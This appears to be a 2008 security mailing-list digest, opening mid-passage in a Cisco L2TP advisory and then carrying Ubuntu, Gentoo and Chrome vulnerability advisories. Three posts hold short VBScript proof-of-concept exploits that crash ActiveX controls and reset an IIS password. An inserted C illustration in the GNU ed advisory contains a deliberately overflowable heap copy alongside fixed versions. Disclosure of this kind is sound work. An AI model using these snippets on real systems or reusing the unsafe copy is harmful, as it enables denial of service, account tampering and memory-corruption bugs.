is running an affected version of 12.2 or 12.4 Cisco IOS system
software. Then check for the process L2TP mgmt daemon running on the
device.

To determine the software version running on a Cisco product, log in
to the device and issue the show version command to display the
system banner. Cisco IOS software will identify itself as
"Internetwork Operating System Software" or simply "IOS." On the next
line of output, the image name will be displayed between parentheses,
followed by "Version" and the IOS release name. Other Cisco devices
will not have the show version command or will give different output.

The following example identifies a Cisco product that is running
Cisco IOS Software Release 12.4(11)T2:

Router#show version
Cisco IOS Software, 7200 Software (C7200-ADVSECURITYK9-M), Version 
12.4(11)T2, RELEASE SOFTWARE (fc4)
Technical Support: http://www.cisco.com/techsupport
Copyright (c) 1986-2007 by Cisco Systems, Inc.
Compiled Tue 01-May-07 04:19 by prod_rel_team

Additional information on the Cisco IOS release naming conventions
can be found in the document entitled "White Paper: Cisco IOS
Reference Guide," which is available at 
http://www.cisco.com/warp/public/620/1.html

To check if the process L2TP mgmt daemon is running on a device, log
in to the command line interface (CLI) and issue the command "show
processes | include L2TP". (NOTE: The command is case sensitive.) If
the output returns a line with the process name L2TP mgmt daemon, the
device is vulnerable. The following example shows a device running
the L2TP mgmt daemon process:

Router#show processes | include L2TP
 158 Mwe 62590FE44  3133322900/24000  0 L2TP mgmt daemon
Router#

The L2TP mgmt daemon is started by several different types of
configurations that may be deployed in networks that leverage the
L2TP protocol. If any of the following commands appear within a
device's configuration, show running-config, then the device will
have started t

Internet Information Service (adsiis.dll) activex remote DOS

2008-09-24 Thread hamedata

# Title: adsiis.dll activex remote DOS

# Exp0iters member (order by alphabet) .:
[Ciph3r,Hamedeta,Rake,Sh3llh3ll,the_Edit0r]

# Author: [hamedata]

# E-mail: [EMAIL PROTECTED]

# Location .: [Iran]

# Software .: [Internet Information Service]

# Sp Tanx2 .: [ALL HACKERS]

# Vulnerability: Remote DOS Exploit

# Part Expl0it & Bug Codes :

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Sub try
    first_arg="expl0iters"
    OF=String(7188, "A")
    target.GetObject first_arg ,OF
End Sub

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

# Part Contact :

Contact me : [EMAIL PROTECTED]

Contact Expl0iters team : the_3dit0r[at]Yahoo[dot]coM





IAS Helper COM Component (iashlpr.dll) activex remote DOS

2008-09-24 Thread hamedata

# Title: iashlpr.dll activex remote DOS

# Exp0iters member (order by alphabet) .:
[Ciph3r,Hamedeta,Rake,Sh3llh3ll,the_Edit0r]

# Author: [hamedata]

# E-mail: [EMAIL PROTECTED]

# Location .: [Iran]

# Software .: [IAS Helper COM Component]

# Sp Tanx2 .: [ALL HACKERS]

# Vulnerability: Remote DOS Exploit

# Part Expl0it & Bug Codes :

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Sub try
    bad_data=-2147483647
    secondarg="expl0iters"
    target.PutProperty bad_data ,secondarg
End Sub

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

# Part Contact :

Contact me : [EMAIL PROTECTED]

Contact Expl0iters team : the_3dit0r[at]Yahoo[dot]coM





Internet Information Service remote set password

2008-09-24 Thread hamedata
""" 
 

"""  :: ::   ::   ::::  ::  """

"""  ::  :: :::: :: ..    ::"""

"""  ::::   : :: ::  :: ::  ::  """

"""  ::  :: ::  ::  : :: ::  :: ::  ::::"""

"""  :: ::   :: : :: :: ::  ::   rs.ir  """

""" ::  """

""" """

"""

   





# Title: Internet Information Service set password

# Expl0iters members (in alphabetical order) .:
[Ciph3r,Hamedeta,Rake,Sh3llh3ll,the_Edit0r]

# Author: [hamedata]

# E-mail: [EMAIL PROTECTED]

# Location .: [Iran]

# Software .: [Internet Information Service]

# Sp Tanx2 .: [ALL HACKERS]

# Vulnerability: Remote set password

# Part Expl0it & Bug Codes :

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Sub try
    iis.SetPassword "exploiters"
End Sub

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

# Part Contact :

Contact me : [EMAIL PROTECTED]
Contact Expl0iters team : the_3dit0r[at]Yahoo[dot]coM

[USN-645-2] Firefox vulnerabilities

2008-09-24 Thread Jamie Strandboge
=== 
Ubuntu Security Notice USN-645-2 September 24, 2008
firefox vulnerabilities
CVE-2008-0016, CVE-2008-3835, CVE-2008-3836, CVE-2008-3837,
CVE-2008-4058, CVE-2008-4059, CVE-2008-4060, CVE-2008-4061,
CVE-2008-4062, CVE-2008-4063, CVE-2008-4064, CVE-2008-4065,
CVE-2008-4066, CVE-2008-4067, CVE-2008-4068, CVE-2008-4069
===

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 6.06 LTS:
  firefox 1.5.dfsg+1.5.0.15~prepatch080614e-0ubuntu3

After a standard system upgrade you need to restart Firefox to
effect the necessary changes.

Details follow:

USN-645-1 fixed vulnerabilities in Firefox and xulrunner for Ubuntu
7.04, 7.10 and 8.04 LTS. This provides the corresponding update for
Ubuntu 6.06 LTS.

Original advisory details:

 Justin Schuh, Tom Cross and Peter Williams discovered errors in the
 Firefox URL parsing routines. If a user were tricked into opening a
 crafted hyperlink, an attacker could overflow a stack buffer and
 execute arbitrary code. (CVE-2008-0016)
 
 It was discovered that the same-origin check in Firefox could be
 bypassed. If a user were tricked into opening a malicious website,
 an attacker may be able to execute JavaScript in the context of a
 different website. (CVE-2008-3835)
 
 Several problems were discovered in the JavaScript engine. This
 could allow an attacker to execute scripts from page content with
 chrome privileges. (CVE-2008-3836)
 
 Paul Nickerson discovered Firefox did not properly process mouse
 click events. If a user were tricked into opening a malicious web
 page, an attacker could move the content window, which could
 potentially be used to force a user to perform unintended drag and
 drop operations. (CVE-2008-3837)
 
 Several problems were discovered in the browser engine. This could
 allow an attacker to execute code with chrome privileges.
 (CVE-2008-4058, CVE-2008-4059, CVE-2008-4060)
 
 Drew Yao, David Maciejak and other Mozilla developers found several
 problems in the browser engine of Firefox. If a user were tricked
 into opening a malicious web page, an attacker could cause a denial
 of service or possibly execute arbitrary code with the privileges
 of the user invoking the program. (CVE-2008-4061, CVE-2008-4062,
 CVE-2008-4063, CVE-2008-4064)
 
 Dave Reed discovered a flaw in the JavaScript parsing code when
 processing certain BOM characters. An attacker could exploit this
 to bypass script filters and perform cross-site scripting attacks.
 (CVE-2008-4065)
 
 Gareth Heyes discovered a flaw in the HTML parser of Firefox. If a
 user were tricked into opening a malicious web page, an attacker
 could bypass script filtering and perform cross-site scripting
 attacks. (CVE-2008-4066)
 
 Boris Zbarsky and Georgi Guninski independently discovered flaws in
 the resource: protocol. An attacker could exploit this to perform
 directory traversal, read information about the system, and prompt
 the user to save information in a file. (CVE-2008-4067,
 CVE-2008-4068)
 
 Billy Hoffman discovered a problem in the XBM decoder. If a user were
 tricked into opening a malicious web page or XBM file, an attacker
 may be able to cause a denial of service via application crash.
 (CVE-2008-4069)


Updated packages for Ubuntu 6.06 LTS:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_1.5.dfsg+1.5.0.15~prepatch080614e-0ubuntu3.diff.gz
  Size/MD5:   184879 85df86b82d3b0791f1152f7048e80c59

http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_1.5.dfsg+1.5.0.15~prepatch080614e-0ubuntu3.dsc
  Size/MD5: 1800 958f213fa0b3290fd34ff151fac0f11e

http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_1.5.dfsg+1.5.0.15~prepatch080614e.orig.tar.gz
  Size/MD5: 47543282 53d4cf0a63c82ad875208a660dfcefd5

  Architecture independent packages:


http://security.ubuntu.com/ubuntu/pool/main/f/firefox/mozilla-firefox_1.5.dfsg+1.5.0.15~prepatch080614e-0ubuntu3_all.deb
  Size/MD5:53526 a27b80846d4996481aa3c9b13ed6e0d4

http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/mozilla-firefox-dev_1.5.dfsg+1.5.0.15~prepatch080614e-0ubuntu3_all.deb
  Size/MD5:52640 b400a1eb1b12d75503cece2b8f9941c3

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):


http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dbg_1.5.dfsg+1.5.0.15~prepatch080614e-0ubuntu3_amd64.deb
  Size/MD5: 47643106 bb2d5e1d0d251044f0dffbc53799af52

http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dev_1.5.dfsg+1.5.0.15~prepatch080614e-0ubuntu3_amd64.deb
  Size/MD5:  2858414 52e37bdb64081a8d5b05abedd62464a7

http://security.ubuntu.com/ubuntu/pool/mai

[USN-645-1] Firefox and xulrunner vulnerabilities

2008-09-24 Thread Jamie Strandboge
=== 
Ubuntu Security Notice USN-645-1 September 24, 2008
firefox, firefox-3.0, xulrunner-1.9 vulnerabilities
CVE-2008-0016, CVE-2008-3835, CVE-2008-3836, CVE-2008-3837,
CVE-2008-4058, CVE-2008-4059, CVE-2008-4060, CVE-2008-4061,
CVE-2008-4062, CVE-2008-4063, CVE-2008-4064, CVE-2008-4065,
CVE-2008-4066, CVE-2008-4067, CVE-2008-4068, CVE-2008-4069
===

A security issue affects the following Ubuntu releases:

Ubuntu 7.04
Ubuntu 7.10
Ubuntu 8.04 LTS

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 7.04:
  firefox 2.0.0.17+0nobinonly-0ubuntu0.7.4

Ubuntu 7.10:
  firefox 2.0.0.17+1nobinonly-0ubuntu0.7.10

Ubuntu 8.04 LTS:
  firefox-3.0 3.0.2+build6+nobinonly-0ubuntu0.8.04.1
  xulrunner-1.9   1.9.0.2+build6+nobinonly-0ubuntu0.8.04.1

After a standard system upgrade you need to restart Firefox and any
applications that use xulrunner, such as Epiphany, to effect the
necessary changes.

Details follow:

Justin Schuh, Tom Cross and Peter Williams discovered errors in the
Firefox URL parsing routines. If a user were tricked into opening a
crafted hyperlink, an attacker could overflow a stack buffer and
execute arbitrary code. (CVE-2008-0016)

It was discovered that the same-origin check in Firefox could be
bypassed. If a user were tricked into opening a malicious website,
an attacker may be able to execute JavaScript in the context of a
different website. (CVE-2008-3835)

Several problems were discovered in the JavaScript engine. This
could allow an attacker to execute scripts from page content with
chrome privileges. (CVE-2008-3836)

Paul Nickerson discovered Firefox did not properly process mouse
click events. If a user were tricked into opening a malicious web
page, an attacker could move the content window, which could
potentially be used to force a user to perform unintended drag and
drop operations. (CVE-2008-3837)

Several problems were discovered in the browser engine. This could
allow an attacker to execute code with chrome privileges.
(CVE-2008-4058, CVE-2008-4059, CVE-2008-4060)

Drew Yao, David Maciejak and other Mozilla developers found several
problems in the browser engine of Firefox. If a user were tricked
into opening a malicious web page, an attacker could cause a denial
of service or possibly execute arbitrary code with the privileges
of the user invoking the program. (CVE-2008-4061, CVE-2008-4062,
CVE-2008-4063, CVE-2008-4064)

Dave Reed discovered a flaw in the JavaScript parsing code when
processing certain BOM characters. An attacker could exploit this
to bypass script filters and perform cross-site scripting attacks.
(CVE-2008-4065)

Gareth Heyes discovered a flaw in the HTML parser of Firefox. If a
user were tricked into opening a malicious web page, an attacker
could bypass script filtering and perform cross-site scripting
attacks. (CVE-2008-4066)

Boris Zbarsky and Georgi Guninski independently discovered flaws in
the resource: protocol. An attacker could exploit this to perform
directory traversal, read information about the system, and prompt
the user to save information in a file. (CVE-2008-4067,
CVE-2008-4068)

Billy Hoffman discovered a problem in the XBM decoder. If a user were
tricked into opening a malicious web page or XBM file, an attacker
may be able to cause a denial of service via application crash.
(CVE-2008-4069)


Updated packages for Ubuntu 7.04:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_2.0.0.17+0nobinonly-0ubuntu0.7.4.diff.gz
  Size/MD5:   316696 fcc877d67c4c479221bbf3c4a3d7eb6d

http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_2.0.0.17+0nobinonly-0ubuntu0.7.4.dsc
  Size/MD5: 2330 b5027c93757b9fec8eda43ee3b93c227

http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_2.0.0.17+0nobinonly.orig.tar.gz
  Size/MD5: 48478465 eb9ca16ce2bd6073cf9cdf1298388ede

  Architecture independent packages:


http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/firefox-dom-inspector_2.0.0.17+0nobinonly-0ubuntu0.7.4_all.deb
  Size/MD5:   243550 c27985a28b56d42f853f614b1329792f

http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/mozilla-firefox-dev_2.0.0.17+0nobinonly-0ubuntu0.7.4_all.deb
  Size/MD5:58896 6617ca36bca4b8f4039a0201548da883

http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/mozilla-firefox-dom-inspector_2.0.0.17+0nobinonly-0ubuntu0.7.4_all.deb
  Size/MD5:58992 330db0a6f2247bc95308f45849f6c347

http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/mozilla-firefox-gnome-support_2.0.0.17+0nobinonly-0ubuntu0.7.4_all.deb
  Size/MD5:59004 de6dddee9f8f3b426f3f92486ec688f4

http://securit

Advisory : Google Chrome Carriage Return Null Object Memory Exhaustion Remote Dos.

2008-09-24 Thread Aditya K Sood


*Google Chrome Carriage Return Null Object Memory Exhaustion Remote Dos.*

*Version Affected:*
Chrome/0.2.149.30
Chrome/0.2.149.29

*Severity:*
High

*Description:*
The Google Chrome browser is vulnerable to a memory exhaustion based
denial of service which can be triggered remotely. The vulnerability
triggers when Carriage Return (\r\n\r\n) is passed as an argument to
the window.open() function. It makes Google Chrome generate a number
of windows at the same time, thereby leading to memory exhaustion. The
behavior can be easily checked by looking at the task manager, as the
memory usage rises high in no time. The problem lies in the handling
of the object and its value returned by the javascript function. Once
it is triggered, the pop-ups start being generated. The Google Chrome
browser generates object windows continuously, thereby affecting the
memory of the resultant system. Probably it can be crashed within no
time.

User interaction is required in this.

*Proof of Concept*
http://www.secniche.org/gds

*Links:*
http://secniche.org/gcrds.html
http://evilfingers.com/advisory/Google_Chrome_Carriage_Return_Null_Object_Memory_Exhaustion_Remote_Dos.php

*Detection:*
SecNiche confirmed this vulnerability affects Google Chrome on Microsoft
Windows XP SP2 platform.The versions tested are:

Chrome/0.2.149.30
Chrome/0.2.149.291

*Disclosure Timeline:*
Disclosed: 22 September 2008
Release Date: September 24, 2008

*Vendor Response:*
Google acknowledges this vulnerability and "fix" will be released soon.

*Credit:*
Aditya K Sood

*Disclaimer*
The information in the advisory is believed to be accurate at the time
of publishing based on currently available information. Use of the
information constitutes acceptance for use in an AS IS condition. There
is no representation or warranties, either express or implied by or
with respect to anything in this document, and shall not be liable for
any implied warranties of merchantability or fitness for a particular
purpose or for any indirect special or consequential damages.


[ GLSA 200809-15 ] GNU ed: User-assisted execution of arbitrary code

2008-09-24 Thread Pierre-Yves Rofes

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200809-15
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
 http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

   Severity: Normal
  Title: GNU ed: User-assisted execution of arbitrary code
   Date: September 23, 2008
   Bugs: #236521
 ID: 200809-15

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

A buffer overflow vulnerability in ed may allow for the remote
execution of arbitrary code.

Background
==========

GNU ed is a basic line editor. red is a restricted version of ed that
does not allow shell command execution.

Affected packages
=================

    -------------------------------------------------------------------
     Package                          /  Vulnerable  /       Unaffected
    -------------------------------------------------------------------
  1  sys-apps/ed                              < 1.0                >= 1.0

Description
===========

Alfredo Ortega from Core Security Technologies reported a heap-based
buffer overflow in the strip_escapes() function when processing overly
long filenames.
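The bug class named above, shown as an added illustration rather than ed's own code: a hypothetical strip_escapes() that copies a filename into a fixed-size heap buffer while removing backslash escapes, with no check that the result fits, beside two hardened forms (one takes the destination capacity and rejects input that would overflow it, the other sizes the destination from the input). The function names, the 256-byte limit and the sample inputs are constructed for this example and are not taken from the advisory or from GNU ed.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Constructed limit for this example; the real editor's buffer sizing is
   not described in the advisory and is not reproduced here. */
#define NAME_BUF_LEN 256

/* Vulnerable pattern (hypothetical, not ed's code): the output buffer has a
   fixed size chosen independently of the input, and nothing checks that the
   stripped name fits. A filename longer than NAME_BUF_LEN writes past the
   end of the heap allocation. Only call it with short input. */
char *strip_escapes_unsafe(const char *name)
{
    char *out = malloc(NAME_BUF_LEN);
    if (out == NULL)
        return NULL;
    size_t i = 0;
    for (; *name != '\0'; name++) {
        if (*name == '\\' && name[1] != '\0')
            name++;                 /* drop the backslash, keep the escaped char */
        out[i++] = *name;           /* no bound check on i */
    }
    out[i] = '\0';
    return out;
}

/* Hardened form: the caller passes the destination and its capacity; the
   copy stops and reports failure before writing past out_size - 1, and the
   buffer is always NUL-terminated. Returns the stripped length, or -1 if
   the result would not fit. */
int strip_escapes_safe(const char *name, char *out, size_t out_size)
{
    if (out_size == 0)
        return -1;
    size_t i = 0;
    for (; *name != '\0'; name++) {
        if (*name == '\\' && name[1] != '\0')
            name++;
        if (i + 1 >= out_size) {    /* no room for this char plus the NUL */
            out[0] = '\0';
            return -1;
        }
        out[i++] = *name;
    }
    out[i] = '\0';
    return (int)i;
}

/* Alternative fix: size the destination from the input. Stripping escapes
   never makes the string longer, so strlen(name) + 1 bytes always suffice. */
char *strip_escapes_dup(const char *name)
{
    size_t cap = strlen(name) + 1;
    char *out = malloc(cap);
    if (out == NULL)
        return NULL;
    if (strip_escapes_safe(name, out, cap) < 0) {
        free(out);
        return NULL;
    }
    return out;
}

int main(void)
{
    char buf[16];
    int n = strip_escapes_safe("a\\ b.txt", buf, sizeof buf);
    printf("short name: %d -> \"%s\"\n", n, buf);       /* 7 -> "a b.txt" */

    char big[40];
    memset(big, 'A', sizeof big - 1);
    big[sizeof big - 1] = '\0';
    n = strip_escapes_safe(big, buf, sizeof buf);
    printf("long name: %d (rejected)\n", n);            /* -1 */

    char *d = strip_escapes_dup("x\\\\y");
    printf("dup: \"%s\"\n", d ? d : "(alloc failed)");  /* "x\y" */
    free(d);
    return 0;
}
```

The point of the pair is that the fix is not a larger constant: either the writer knows the destination's capacity and refuses to exceed it, or the destination is allocated from the length of the source so that it cannot be exceeded.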

Impact
======

A remote attacker could entice a user to process specially crafted
commands with ed or red, possibly resulting in the execution of
arbitrary code with the privileges of the user running the application.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All GNU ed users should upgrade to the latest version:

 # emerge --sync
 # emerge --ask --oneshot --verbose ">=sys-apps/ed-1.0"

References
==========

   [ 1 ] CVE-2008-3916
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3916

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

   http://security.gentoo.org/glsa/glsa-200809-15.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2008 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5







[ GLSA 200809-14 ] BitlBee: Security bypass

2008-09-24 Thread Pierre-Yves Rofes

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200809-14
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
 http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

   Severity: Normal
  Title: BitlBee: Security bypass
   Date: September 23, 2008
   Bugs: #236160
 ID: 200809-14

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Multiple vulnerabilities in BitlBee may allow bypassing security
restrictions and hijacking accounts.

Background
==========

BitlBee is an IRC to IM gateway that supports multiple IM protocols.

Affected packages
=================

    -------------------------------------------------------------------
     Package                          /  Vulnerable  /       Unaffected
    -------------------------------------------------------------------
  1  net-im/bitlbee                          < 1.2.3              >= 1.2.3

Description
===========

Multiple unspecified vulnerabilities were reported, including a NULL
pointer dereference.

Impact
======

A remote attacker could exploit these vulnerabilities to overwrite
existing IM accounts.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All BitlBee users should upgrade to the latest version:

 # emerge --sync
 # emerge --ask --oneshot --verbose ">=net-im/bitlbee-1.2.3"

References
==========

   [ 1 ] CVE-2008-3920
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3920
   [ 2 ] CVE-2008-3969
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3969

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

   http://security.gentoo.org/glsa/glsa-200809-14.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2008 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5







mantis CVE-2008-3102 (Re: menalto gallery: Session hijacking vulnerability, CVE-2008-3102)

2008-09-24 Thread Hanno Böck
Damn, subject is obviously wrong, it's mantis, gallery was already 
CVE-2008-3662. Rest of the advisory is correct though.

Sorry for the confusion.

-- 
Hanno Böck  Blog:   http://www.hboeck.de/
GPG: 3DBD3B20   Jabber/Mail:[EMAIL PROTECTED]

